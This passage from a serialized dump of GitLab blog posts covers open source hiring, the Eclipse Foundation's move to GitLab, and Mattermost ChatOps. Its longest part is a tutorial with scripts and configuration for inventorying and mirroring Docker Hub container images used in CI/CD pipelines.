needs.\n\nFor those looking to get some open source experience, there are a number of ways to get involved, including, of course, [GitLab](/community/contribute/). Duane pointed to paid opportunities like [Outreachy](https://www.outreachy.org/), which offers internships to people in underrepresented groups to support them in making their first contributions into open source, as well as bug bounties.\n\nDuane recently presented his talk at All Things Open and the Seattle GNU/Linux conference. He may present the talk again at a few more events in the near future.\n\n\"Since it's a topic that seems to come up in our social sphere every few months or so, I want to encourage us to go back and look at Ashe's blog post, and the other people who've already been talking about it,\" he said. \"There are many different ways to evaluate candidates besides just looking at their GitHub data, and it’s important that look at the whole picture when we evaluate candidates.\"\n\nWhat role do you think open source contributions should play in the hiring process? Sound off on Twitter and let us know [@GitLab](https://twitter.com/gitlab) or comment below.\n\n**Footnotes**\n\n[1](http://opensourcesurvey.org/2017/#insights),\n[2](https://assets.digitalocean.com/currents-report/DigitalOcean-Currents-Q4-2017.pdf),\n3 You can see some discussion of this in this [Twitter thread](https://twitter.com/DuaneOBrien/status/963499537154310145), which refers to the [first Sentry Scouts meetup](https://sentry.io/_/events/2018-01-17-sentry-scouts-1/).\n{: .note}\n",[1078,9,267],{"slug":2894,"featured":6,"template":689},"hiring-based-on-open-source-contributions-could-be-harmful","content:en-us:blog:hiring-based-on-open-source-contributions-could-be-harmful.yml","Hiring Based On Open Source Contributions Could Be Harmful","en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful.yml","en-us/blog/hiring-based-on-open-source-contributions-could-be-harmful",{"_path":2900,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2901,"content":2907,"config":2913,"_id":2915,"_type":14,"title":2916,"_source":16,"_file":2917,"_stem":2918,"_extension":19},"/en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab",{"title":2902,"description":2903,"ogTitle":2902,"ogDescription":2903,"noIndex":6,"ogImage":2904,"ogUrl":2905,"ogSiteName":673,"ogType":674,"canonicalUrls":2905,"schema":2906},"How the Eclipse Foundation champions open source with GitLab","In this interview, learn how adopting GitLab helps the Eclipse Foundation be a more effective champion for open source.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679184/Blog/Hero%20Images/eclipsefoundationcover.png","https://about.gitlab.com/blog/how-eclipse-foundation-champions-open-source-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How the Eclipse Foundation champions open source with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-10-19\",\n      }",{"title":2902,"description":2903,"authors":2908,"heroImage":2904,"date":2910,"body":2911,"category":10,"tags":2912},[2909],"Bryan Behrenshausen","2023-10-19","\nThe Eclipse Foundation is a pillar of the open source ecosystem. Home to more than 415 open source projects, the not-for-profit organization has been championing open source collaboration and innovation for more than two decades.\n\nGitLab plays a significant role in the Eclipse Foundation's operations, and the organization recently joined the GitLab [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community. To mark the occasion, I caught up with Denis Roy, IT director at the Eclipse Foundation, to chat about the organization's history, vision, and passion for open source development.\n\n**We're so excited to welcome the Eclipse Foundation to the GitLab Open Source Partners community. You've been champions of open source for quite some time. Tell us about your history and the mission that guides you today.**\n\nThe Eclipse Foundation was born in 2004, as a not-for-profit, [open source](https://go.gitlab.com/spHNym) software foundation with the goal of driving the evolution of the Eclipse Platform and its ecosystem of tools, plugins, and addons in a vendor-neutral, open, and transparent community. Since then, the Eclipse Foundation has become one of the world's largest open source software foundations. The foundation offers a mature, scalable, and business-friendly environment for open source software collaboration and innovation, hosting more than 415 open source projects, including runtimes, tools, and frameworks for a wide range of technology domains such as the Internet of Things, automotive, geospatial, systems engineering, and many others.\n\n> Connect with the GitLab Open Source Partners on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n\n**How does the Eclipse Foundation use GitLab? What has using GitLab helped you accomplish?**\n\nGitLab has allowed us to modernize our development platform, because it offers an integrated, cohesive environment to help maximize developer productivity while reducing the administrative overhead related to managing such a complex set of tools. With a single package to upgrade and maintain, and tight integration between code repositories, issue trackers, wikis, code review, and CI tools, it's easier for the Eclipse Foundation's IT team to stay up to date. This has allowed us to reduce our reliance on customized, in-house code.\n\nWhen we began our work in 2004, open source code hosting options were rudimentary and limited. At the time, we created our own forge by using a handful of tools that were not designed with interoperability in mind, including [CVS](https://www.nongnu.org/cvs/), [Bugzilla](https://www.bugzilla.org/), and [MediaWiki](https://www.mediawiki.org/wiki/MediaWiki). When it came time to refresh our offering, it was an easy decision to replace our home-grown forge with GitLab, since GitLab offers a seamless integration of all these developer tools, and many more, within a single, easy-to-use package. This creates a very useful environment for our developers and allows the project teams to be productive while offering a familiar interface for interacting and building their user communities.\n\nAt this time, [the Eclipse Foundation's GitLab instance](https://gitlab.eclipse.org) hosts more than 70 [open source software projects](https://gitlab.eclipse.org/eclipse) and dozens of other projects that [help us manage and support our community](https://gitlab.eclipse.org/eclipsefdn).\n\n**How big is the Eclipse Foundation's IT team? What have you seen the team achieve after the migration to GitLab?**\n\nThe Foundation's IT team consists of a dozen people, split almost evenly between infrastructure, release engineering, security, and web development. Our migration to GitLab is still a work in progress, but it's allowing the Eclipse Foundation IT team to consolidate our code repositories, issues, and documentation onto a single platform with a modern and friendly UI. The same is also true for the Eclipse OSS projects that have, or are currently migrating from, \"pure Git\" to GitLab.\n\nWith GitLab, the team is seeing a notable decrease in both administrative overhead and user support, as using, managing, and maintaining GitLab on premise is straightforward and very robust. We're able to stay up-to-date with new GitLab releases easily, which scores extra points with our security team. We're able to use that freed time towards activities that benefit our community and provide extra value.\n\n**What's on the horizon for the Eclipse Foundation? What are your most important initiatives right now?**\n\nOne of the big initiatives we’re working on right now is improving the security of our open source projects. We’ve made a significant investment in security over the past year, including auditing some of our top projects for security concerns and we are looking to establish a [working group](https://www.eclipse.org/org/workinggroups/eclipse-cyber-risk-concept.php) to help us gain the resources we need to enhance our security processes across all of our operations.\n\nWe're also focused on growing the [Eclipse Software Defined Vehicle](https://sdv.eclipse.org/) community, which continues to gain momentum with new members like General Motors, Qualcomm, and Microsoft. The automotive industry is becoming increasingly willing to collaborate on open source software, and experience the technological and business benefits of doing so.  \n\n**How can GitLab community members get more involved in the Eclipse Foundation's work?**\n\nIt's easy! Browse the list of [Eclipse Projects](https://projects.eclipse.org/) and discover the Developer Resources section. Or browse the list of projects on Eclipse's [GitLab instance](https://gitlab.eclipse.org/eclipse) and send in those those merge requests!\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":2914,"featured":6,"template":689},"how-eclipse-foundation-champions-open-source-with-gitlab","content:en-us:blog:how-eclipse-foundation-champions-open-source-with-gitlab.yml","How Eclipse Foundation Champions Open Source With Gitlab","en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab.yml","en-us/blog/how-eclipse-foundation-champions-open-source-with-gitlab",{"_path":2920,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2921,"content":2927,"config":2934,"_id":2936,"_type":14,"title":2937,"_source":16,"_file":2938,"_stem":2939,"_extension":19},"/en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops",{"title":2922,"description":2923,"ogTitle":2922,"ogDescription":2923,"noIndex":6,"ogImage":2924,"ogUrl":2925,"ogSiteName":673,"ogType":674,"canonicalUrls":2925,"schema":2926},"Teams speed development with GitLab & Mattermost ChatOps","A complete DevOps toolchain plus open source messaging and ChatOps – what’s not to love?","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680983/Blog/Hero%20Images/mattermost-gitlab.png","https://about.gitlab.com/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How enterprise dev teams use GitLab and Mattermost ChatOps to accelerate development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Blais – Mattermost\"}],\n        \"datePublished\": \"2020-01-13\",\n      }",{"title":2928,"description":2923,"authors":2929,"heroImage":2924,"date":2931,"body":2932,"category":10,"tags":2933},"How enterprise dev teams use GitLab and Mattermost ChatOps to accelerate development",[2930],"Jason Blais – Mattermost","2020-01-13","\n\nThere has never been more pressure on development teams to build software faster and more efficiently. The rise in popularity of DevOps has largely been the result of its promise to speed up dev cycles, increase agility, and help teams resolve issues more quickly. And while the availability and sophistication of DevOps tools have improved greatly in the last few years, simply choosing the latest and greatest tools is no guarantee of a smooth, problem-free development lifecycle.\n\n## Why GitLab\n\nIn an ecosystem with exponentially increasing choice and complexity, GitLab provides a complete open source [DevOps platform](/solutions/devops-platform/) that can speed up cycles, reduce development costs, and improve developer efficiency. From planning and code to deployment and monitoring (and back again), GitLab brings a myriad of tools together into one open source toolset.\n\n## Why Mattermost ChatOps\n\nWe’re big fans of GitLab here at Mattermost, which is why Mattermost is packaged with GitLab Omnibus and why we work to make sure Mattermost is easy to [set up with GitLab](https://gitlab.com/gitlab-org/omnibus-gitlab/tree/master/doc/gitlab-mattermost).\n\n[Mattermost’s open source ChatOps platform](https://mattermost.com/blog/introducing-mattermost-chatops/) allows you to surface relevant information to your team and enables you to take action directly where you’re having conversations. When an issue comes in, a ChatOps workflow can alert relevant team members, who all work together to make a fix directly within Mattermost.\n\nChatOps provides a method to interact with CI/CD jobs through messaging. Many organizations’ discussion, collaboration, and troubleshooting is taking place in messaging services these days, and having a method to run CI/CD jobs with output posted back to the channel can significantly accelerate a team’s workflow. ChatOps not only increases communication and collaboration, but a searchable history of the conversations associated with your development cycle increases transparency and creates a repository of valuable information for the team.\n\n## Mattermost + GitLab\n\nA complete DevOps toolchain plus open source messaging and ChatOps – what’s not to love? With GitLab and Mattermost, teams can not only simplify their DevOps process, but also bring their processes into the same chat interface where team members are discussing issues, collaborating, and making decisions.\n\nHere are a couple of examples of how development teams use Mattermost and GitLab together to accelerate developer productivity through ChatOps.\n\n### itk uses GitLab and Mattermost to ship more code on time and 6x production deployments per year\n\n[Itk](https://www.itk.fr/en/), based in Montpellier, France, develops tools and applications to help farmers optimize yields, increase the quality of crops, and manage risks more effectively.\n\nThey began using GitLab around 2014 and primarily used a legacy chat tool for day-to-day collaboration, messaging, and video calling. However, as the company grew, this tool didn’t scale with them; there was no persistent, easily searchable messaging, and collaboration across the team became more difficult. They began to look for an alternative.\n\nShortly thereafter, they discovered that the GitLab Omnibus package ships with an open source messaging platform for developers: Mattermost. They immediately fell in love with its easy code-sharing capabilities – including automatic syntax highlighting and full Markdown support, and the ease of sharing knowledge, searching past conversations, and collaborating on ideas across the team to develop new solutions all integrated together with GitLab.\n\nBefore switching to Mattermost, team members hadn’t been able to easily get notified about their development process. But they wanted to be able to visibly track projects, merge requests, and other activities from GitLab.\n\nThis is when Romain Maneschi, a software developer at itk, began writing a GitLab plugin for Mattermost that would further enable his team to subscribe to GitLab notifications in Mattermost and receive notifications about new issue assignments and review requests in one place.\n\nToday, [the plugin supports](https://github.com/mattermost/mattermost-plugin-gitlab):\n\n- **Daily reminders** – get informed on what issues and merge requests need your attention\n- **Notifications** – get notified in Mattermost when someone mentions you, requests your review, or assigns an issue to you on GitLab\n- **Sidebar buttons** – stay up-to-date with how many reviews, unread messages, assignments and open merge requests you have with buttons in the Mattermost sidebar\n- **Subscribe to projects** – use slash commands to subscribe a Mattermost channel to receive notifications of new merge requests or issues in a GitLab project\n\nNow, his whole company uses both GitLab and Mattermost to accelerate workflows through ChatOps. As a result, they now ship more code on time, resulting in 3x growth in the number of projects and microservices managed by the team and 6x growth in the number of production deployments within a year – all while growing their dev and agronomist teams by 5x.\n\n![GitLab Mattermost plugin](https://about.gitlab.com/images/blogimages/gitlab-mattermost-plugin.png){: .shadow.medium.center}\n\u003C!-- image: https://user-images.githubusercontent.com/13119842/70714554-5b52cc80-1cb6-11ea-9cd6-705a68f9ac1b.png -->\n\n### A software development company increases productivity through better transparency and visibility into code and configuration changes\n\nA software development and data services company based in the state of Maryland has also rolled out Mattermost integrated with GitLab to increase productivity and seamlessly collaborate.  They provide analytics, data management, and software development services to biomedical researchers and organizations worldwide.\n\nGitLab is heavily used across their team and they consider it a huge asset in their DevOps workflows.\n\nThey have also integrated GitLab and Mattermost together by pushing GitLab commits to a single Mattermost channel via webhooks, enabling senior management to get a bird’s-eye view of everything that’s rolling through in a given day. It includes updates for configuration management and version control, giving a snapshot of different changes made to internal infrastructure and systems throughout the day.\n\nThe team has also set up separate “Heartbeat” channels to send notifications on application events. Having these messages funnel to specific Heartbeat channels avoids distracting the flow of conversations in regular project collaboration channels while empowering team members to jump on issues posted in the Heartbeat channels.\n\nOne of the key benefits this integration brings to the team is the visibility of changes made to versions and configuration management in real time; as soon as a change is committed and pushed live, a notification is sent to the Heartbeat channel which anyone can subscribe to. No more switching between apps, asking team members, or tracking down commits – it’s now all in one place inside Mattermost while configuration management and app development takes place in GitLab.\n\n### GitLab and Mattermost ChatOps improve transparency and productivity to accelerate development\n\nMattermost [ships as part of the GitLab Omnibus package](https://docs.gitlab.com/omnibus/gitlab-mattermost/), providing out-of-the box support for GitLab SSO, pre-packaged GitLab integrations, and PostgreSQL support, along with a Prometheus integration that enables systems monitoring and [incident response management](https://docs.gitlab.com/ee/user/project/integrations/prometheus.html#taking-action-on-incidents). Finally, Mattermost can now also be deployed [with GitLab Cloud Native](https://docs.mattermost.com/install/install-mmte-helm-gitlab-helm.html).\n\nThere’s never been a better time for DevOps teams to get the full benefits of open source ChatOps. Try it out by installing GitLab Omnibus with Mattermost today.",[779,231,9],{"slug":2935,"featured":6,"template":689},"how-enterprise-dev-teams-use-gitlab-mattermost-chatops","content:en-us:blog:how-enterprise-dev-teams-use-gitlab-mattermost-chatops.yml","How Enterprise Dev Teams Use Gitlab Mattermost Chatops","en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops.yml","en-us/blog/how-enterprise-dev-teams-use-gitlab-mattermost-chatops",{"_path":2941,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2942,"content":2948,"config":2954,"_id":2956,"_type":14,"title":2957,"_source":16,"_file":2958,"_stem":2959,"_extension":19},"/en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub",{"title":2943,"description":2944,"ogTitle":2943,"ogDescription":2944,"noIndex":6,"ogImage":2945,"ogUrl":2946,"ogSiteName":673,"ogType":674,"canonicalUrls":2946,"schema":2947},"GitLab helps mitigate Docker Hub's open source image removal","CI/CD and Kubernetes deployments can be affected by Docker Hub tier changes. This tutorial walks through analysis, mitigations, and long-term solutions.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659883/Blog/Hero%20Images/post-cover-image.jpg","https://about.gitlab.com/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab can help mitigate deletion of open source container images on Docker Hub\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Friedrich\"}],\n        \"datePublished\": \"2023-03-16\",\n      }",{"title":2949,"description":2944,"authors":2950,"heroImage":2945,"date":2951,"body":2952,"category":801,"tags":2953},"How GitLab can help mitigate deletion of open source container images on Docker Hub",[1798],"2023-03-16","\nDocker, Inc. shared an email update to Docker Hub users that it will [sunset Free Team organizations](https://www.infoworld.com/article/3690890/docker-sunsets-free-team-subscriptions-roiling-open-source-projects.html). If accounts do not upgrade to a paid plan before April 14, 2023, their organization's images may be deleted after 30 days. This change can affect open source organizations that publish their images on Docker Hub, as well as consumers of these container images, used in CI/CD pipelines, Kubernetes cluster deployments, or docker-compose demo environments. This blog post discusses tools and features on the GitLab DevSecOps platform to help users analyze and mitigate the potential impact on production environments.\n\n_Update (March 20, 2023): Docker, Inc. [published an apology blog post](https://www.docker.com/blog/we-apologize-we-did-a-terrible-job-announcing-the-end-of-docker-free-teams/), including a FAQ, and clarifies that the company will not delete container images by themselves. Maintainers can migrate to a personal account, join the Docker-sponsored open source program, or opt into a paid plan. If open source container image maintainers do nothing, this leads into another issue: Stale container images can become a security problem. The following blog post can help with security analysis and migration too._ \n\n_Update (March 27, 2023): On March 24, 2023, Docker, Inc. [published another blog post](https://www.docker.com/blog/no-longer-sunsetting-the-free-team-plan/) announcing the reversal of the decision to sunset the Free team plan and updated its [FAQ for Free Team organization](https://www.docker.com/developers/free-team-faq/). While this is a welcome development for the entire community, it is still crucial to ensure the reliability of your software development lifecycle by ensuring redundancies are in place for your container registries, as detailed in this blog post._\n\n### Inventory of used container images\n\nCI/CD pipelines in GitLab can execute jobs in containers. This is specified by the [`image` keyword](https://docs.gitlab.com/ee/ci/yaml/#image) in jobs, job templates, or as a global [`default`](https://docs.gitlab.com/ee/ci/yaml/#default) attribute. For the first iteration, you can clone a GitLab project locally, and search for the `image` string in all CI/CD configuration files. The following example shows how to execute the `find` command on the command line interface (CLI), searching for files matching the name pattern `*ci.yml`, and looking for the `image` string in the file content. The command line prints a list of search pattern matches, and the corresponding file name to the standard output. The example inspects the [project](https://gitlab.com/gitlab-com/www-gitlab-com) for the [GitLab handbook](https://about.gitlab.com/handbook/) and [website](https://about.gitlab.com/) to analyze whether its CI/CD deployment pipelines could be affected by the Docker Hub changes.\n\n```bash\n$ git clone https://gitlab.com/gitlab-com/www-gitlab-com && cd www-gitlab-com\n\n$ find . -type f -iname '*ci.yml' -exec sh -c \"grep 'image:' '{}' && echo {}\" \\;\n\n  image: registry.gitlab.com/gitlab-org/gitlab-build-images:www-gitlab-com-debian-${DEBIAN_VERSION}-ruby-3.0-node-16\n  image: alpine:edge\n  image: alpine:edge\n  image: debian:stable-slim\n  image: debian:stable-slim\n  image: registry.gitlab.com/gitlab-org/gitlab-build-images:danger\n./.gitlab-ci.yml\n```\n\nA [discussion on Hacker News](https://news.ycombinator.com/item?id=35168802) mentions that \"official Docker images\" are not affected, but this is not officially confirmed by Docker yet. [Official Docker images](https://hub.docker.com/u/library) do not use a namespace prefix, i.e. `namespace/imagename` but instead `debian:\u003Ctagname>` for example. `registry.gitlab.com/gitlab-org/gitlab-build-images:danger` uses a full URL image string, which includes the image registry server domain, `registry.gitlab.com` in the shown example.\n\nIf there is no full URL prefix in the image string, this is an indicator that this image could be pulled from Docker Hub by default. There might be other infrastructure safety nets put in place, for example a cloud provider registry which caches the Docker Hub images (Google Cloud, AWS, Azure, etc.).\n\n#### Advanced search for images\n\nYou can use the [project lint API endpoint](https://docs.gitlab.com/ee/api/lint.html#validate-a-projects-ci-configuration) to fetch the CI configuration. The following script uses the [python-gitlab API library](https://python-gitlab.readthedocs.io/en/stable/gl_objects/ci_lint.html) to implement the API endpoint:\n\n1. Collect all projects from either a single project ID, a group ID with projects, or from the instance.\n2. Run the `project.ci_lint.get()` method to get a merged yaml configuration for CI/CD from the current GitLab project.\n3. Parse the yaml content and print only the job names, and the image keys.\n\nThe [full script is located here](https://gitlab.com/gitlab-da/use-cases/gitlab-api/gitlab-api-python/-/blob/main/get_all_cicd_job_images.py), and is open source, licensed under MIT.\n\n```python\n#!/usr/bin/env python\n\nimport gitlab\nimport os\nimport sys\nimport yaml\n\nGITLAB_SERVER = os.environ.get('GL_SERVER', 'https://gitlab.com')\nGITLAB_TOKEN = os.environ.get('GL_TOKEN') # token requires developer permissions\nPROJECT_ID = os.environ.get('GL_PROJECT_ID') #optional\n# https://gitlab.com/gitlab-da/use-cases/docker\nGROUP_ID = os.environ.get('GL_GROUP_ID', 65096153) #optional\n\n#################\n# Main\n\nif __name__ == \"__main__\":\n    if not GITLAB_TOKEN:\n        print(\"🤔 Please set the GL_TOKEN env variable.\")\n        sys.exit(1)\n\n    gl = gitlab.Gitlab(GITLAB_SERVER, private_token=GITLAB_TOKEN)\n\n    # Collect all projects, or prefer projects from a group id, or a project id\n    projects = []\n\n    # Direct project ID\n    if PROJECT_ID:\n        projects.append(gl.projects.get(PROJECT_ID))\n\n    # Groups and projects inside\n    elif GROUP_ID:\n        group = gl.groups.get(GROUP_ID)\n\n        for project in group.projects.list(include_subgroups=True, all=True):\n            # https://python-gitlab.readthedocs.io/en/stable/gl_objects/groups.html#examples\n            manageable_project = gl.projects.get(project.id)\n            projects.append(manageable_project)\n\n    # All projects on the instance (may take a while to process)\n    else:\n        projects = gl.projects.list(get_all=True)\n\n    print(\"# Summary of projects and their CI/CD image usage\")\n\n    # Loop over projects, fetch .gitlab-ci.yml, run the linter to get the full translated config, and extract the `image:` setting\n    for project in projects:\n\n        print(\"# Project: {name}, ID: {id}\\n\\n\".format(name=project.name_with_namespace, id=project.id))\n\n        # https://python-gitlab.readthedocs.io/en/stable/gl_objects/ci_lint.html\n        lint_result = project.ci_lint.get()\n\n        data = yaml.safe_load(lint_result.merged_yaml)\n\n        for d in data:\n            print(\"Job name: {n}\".format(n=d))\n            for attr in data[d]:\n                if 'image' in attr:\n                    print(\"Image: {i}\".format(i=data[d][attr]))\n\n        print(\"\\n\\n\")\n\nsys.exit(0)\n```\n\nThe [script](https://gitlab.com/gitlab-de/use-cases/gitlab-api/gitlab-api-python/-/blob/main/get_all_cicd_job_images.py) requires Python (tested with 3.11) and the python-gitlab and pyyaml modules. Example on macOS with Homebrew:\n\n```shell\n$ brew install python\n$ pip3 install python-gitlab pyyaml\n```\n\nYou can execute the script and set the different environment variables to control its behavior:\n\n```shell\n$ export GL_TOKEN=$GITLAB_TOKEN\n\n$ export GL_GROUP_ID=12345\n$ export GL_PROJECT_ID=98765\n\n$ python3 get_all_cicd_job_images.py\n\n# Summary of projects and their CI/CD image usage\n# Project: Developer Evangelism at GitLab  / use-cases / Docker Use cases  / Custom Container Image Python, ID: 44352983\n\nJob name: docker-build\nImage: docker:latest\n\n# Project: Developer Evangelism at GitLab  / use-cases / Docker Use cases  / Gitlab Dependency Proxy, ID: 44351128\n\nJob name: .test-python-version\nJob name: image-docker-hub\nImage: python:3.11\nJob name: image-docker-hub-dep-proxy\nImage: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/python:3.11\n```\n\nPlease verify the script and fork it for your own analysis and mitigation. The missing parts are checking the image URLs, and doing a more sophisticated search. The code has been prepared to either check against a single project, a group with projects, or an instance (this may take very long, use with care).\n\nYou can perform a more history-focused analysis by fetching the CI/CD job logs from GitLab and search for the pulled container image to get an overview of past Docker executor runs – for example: `Using Docker executor with image python:3.11 ...`. The screenshot shows the CI/CD job logs UI search – you can automate the search using the GitLab API, and the [python-gitlab library](https://python-gitlab.readthedocs.io/en/stable/gl_objects/pipelines_and_jobs.html#jobs), for example.\n\n![GitLab CI/CD job logs, searching for the `image` keyword](https://about.gitlab.com/images/blogimages/docker-hub-oss-image-deletion-mitigation/cicd_gitlab_job_logs_search_image.png)\n\nThis snippet can be used in combination with the code shared for the CI lint API endpoint. It fetches the job trace logs, and searches for the `image` keyword in the log. The missing parts are splitting the log line by line, and extracting the image key information. This is left as an exercise for the reader.\n\n```python\n        for job in project.jobs.list():\n            log_trace = str(job.trace())\n\n            print(log_trace)\n\n            if 'image' in log_trace:\n                print(\"Job ID: {i}, URL {u}\".format(i=job.id, u=job.web_url))\n                print(log_trace)\n```\n\n### More inventory considerations\n\nSimilar to the API script for CI/CD navigating through all projects, you will need to analyze all Kubernetes manifest configuration files – using either a pull- or push-based approach. This can be achieved by using the [python-gitlab methods to load files from the repository](https://python-gitlab.readthedocs.io/en/stable/gl_objects/projects.html#project-files) and searching the content in similar ways. Helm charts use container images, too, and will require additional analysis.\n\nAn additional search possibility: Custom-built container images that use Docker Hub images as a source. A project will consist of:\n\n1. `Dockerfile` file that uses `FROM \u003Cimagename>`\n2. `.gitlab-ci.yml` configuration file that builds container images (using Docker-in-Docker, Kaniko, etc.)\n\nAn alternative search method for customers is available by using the [Advanced Search](https://docs.gitlab.com/ee/user/search/advanced_search.html) through the GitLab UI and API. The following example uses the [scope: blobs](https://docs.gitlab.com/ee/api/search.html#scope-blobs-premium-2) to search for the `FROM` string:\n\n```shell\n$ export GITLAB_TOKEN=xxxxxxxxx\n\n# Search in https://gitlab.com/gitlab-da\n/use-cases/docker/custom-container-image-python\n\n$ curl --header \"PRIVATE-TOKEN: $GITLAB_TOKEN\" \"https://gitlab.com/api/v4/projects/44352983/search?scope=blobs&search=FROM%20filename:Dockerfile*\"\n```\n\n![Command line output from Advanced Search API, scope blobs, search `FROM` in `Dockerfile*` file names.](https://about.gitlab.com/images/blogimages/docker-hub-oss-image-deletion-mitigation/cli_gitlab_advanced_search_api_dockerfile_from.png)\n\n## Mitigations and solutions\n\nThe following sections discuss potential mitigation strategies, and long-term solutions.\n\n### Mitigation: GitLab dependency proxy\n\nThe dependency proxy provides a caching mechanism for Docker Hub images. It helps reduce the bandwidth and time required to download and pull the images. It also helped to [mitigate the Docker Hub pull rate limits introduced in 2020](/blog/minor-breaking-change-dependency-proxy/). The dependency proxy can be configured for public and private projects.\n\nThe [dependency proxy](https://docs.gitlab.com/ee/user/packages/dependency_proxy/) needs to be enabled for a group. It also needs to be enabled by an instance administrator for self-managed environments, if turned off.\n\nThe following example creates two jobs: `image-docker-hub` and `image-docker-hub-dep-proxy`. The dependency proxy job uses the `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` CI/CD variable to instruct GitLab to store the image in the cache, and only pull it once when not available.\n\n```yaml\n.test-python-version:\n  script:\n    - echo \"Testing Python version:\"\n    - python --version\n\nimage-docker-hub:\n  extends: .test-python-version\n  image: python:3.11\n\nimage-docker-hub-dep-proxy:\n  extends: .test-python-version\n  image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/python:3.11\n```\n\nThe configuration is available in [this project](https://gitlab.com/gitlab-de/use-cases/docker/gitlab-dependency-proxy).\n\nThe stored container image is visible at the group level in the `Package and container registries > Dependency Proxy` menu.\n\n### Mitigation: Container registry mirror\n\n[This blog post](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/) describes how to run a local container registry mirror. Skopeo from Red Hat is another alternative for syncing container image registries, a practical example is described [in this article](https://marcbrandner.com/blog/transporting-container-images-with-skopeo/).\n\nThe GitLab Cloud Native installation ([Helm charts](https://docs.gitlab.com/charts/) and [Operator](https://docs.gitlab.com/operator/)) use a [mirror of tagged images](https://gitlab.com/gitlab-org/cloud-native/mirror/images) consumed by the related projects. Other product stages follow a similar approach, the [security scanners are shipped in container images](https://docs.gitlab.com/ee/user/application_security/offline_deployments/#container-registries-and-package-repositories) maintained by GitLab. This also enables self-managed airgapped installations.\n\n### Mitigation: Custom images in GitLab container registry\n\nReproducible builds and compliance requirements may have required you to create custom container images for CI/CD and Kubernetes already. This is also key to verify that no untested and untrusted images are being used in production. GitLab provides a fully integrated [container registry](https://docs.gitlab.com/ee/user/packages/container_registry/), which can be used natively within CI/CD pipelines and [GitOps workflows with the agent for Kubernetes](https://docs.gitlab.com/ee/user/clusters/agent/gitops.html).\n\nThe following `Dockerfile` example extends an existing image layer, and installs additional tools using the Debian Apt package manager.\n\n```\nFROM python:3.11-bullseye\n\nENV DEBIAN_FRONTEND noninteractive\n\nRUN apt update && apt -y install git curl jq && rm -rf /var/lib/apt/lists/*\n```\n\nYou can [use Docker to build container images](https://docs.gitlab.com/ee/ci/docker/using_docker_build.html), and alternative options are Kaniko or Podman. On GitLab.com SaaS, you can use the Docker CI/CD template to build and push images. The following example modifies the `docker-build` job to only build the latest tag from the default branch:\n\n```yaml\ninclude:\n  - template: Docker.gitlab-ci.yml\n\ndocker-build:\n  stage: build\n  rules:\n    - if: '$CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH || $CI_COMMIT_TAG'\n      #when: manual\n      #allow_failure: true\n```\n\nFor this example, we specifically want to provide a Git tag that gets used for the container image tag as well.\n\n```\n$ git tag 3-11-bullseye\n$ git push --tags\n```\n\nThe image will be available at the GitLab container registry URL and the project namespace path.This path needs to be replaced in all projects that use a Python-based image. You can [create scripts for the GitLab API](/blog/efficient-devsecops-workflows-hands-on-python-gitlab-api-automation/) to update files and create MRs automatically,\n\n```\nimage: registry.gitlab.com/gitlab-da/use-cases/docker/custom-container-image-python:3-11-bullseye\n```\n\n_Note: This is a demo project and not actively maintained. Please fork/copy it for your own needs._\n\n## Observability and security\n\nThe [number of failed CI/CD pipelines](https://docs.gitlab.com/ee/user/analytics/ci_cd_analytics.html) can be a good service level indicator (SLI) to verify whether the environment is affected by the Docker Hub changes. The same SLI applies for CI/CD jobs that build container images, using a `Dockerfile` file, which is based on Docker Hub images (FROM \u003Cimagename>).\n\nA similar SLI applies to Kubernetes cluster deployments – if they continue to generate failures in GitOps pull or CI/CD push scenarios, additional analysis and actions are required. The pod status `ErrImagePull` and [`ImagePullBackOff`](https://kubernetes.io/docs/concepts/containers/images/#imagepullbackoff) will immediately show the problems. The [image pull policy](https://kubernetes.io/docs/concepts/containers/images/#image-pull-policy) should also be revised – `Always` will immediately cause a problem, while `IfNotPresent` will use the local image cache.\n\n[This alert rule example](https://awesome-prometheus-alerts.grep.to/rules.html#rule-kubernetes-1-18) for Prometheus observing a Kubernetes cluster can help detect the pod state as not healthy.\n\n```yaml\n  - alert: KubernetesPodNotHealthy\n    expr: sum by (namespace, pod) (kube_pod_status_phase{phase=~\"Pending|Unknown|Failed\"}) > 0\n    for: 15m\n    labels:\n      severity: critical\n    annotations:\n      summary: Kubernetes Pod not healthy (instance {{ $labels.instance }})\n      description: \"Pod has been in a non-ready state for longer than 15 minutes.\\n  VALUE = {{ $value }}\\n  LABELS = {{ $labels }}\"\n```\n\nCI/CD pipeline linters and Git hooks can also be helpful to enforce using a GitLab registry URL prefix in all `image` tags, when new updates to CI/CD configurations are being 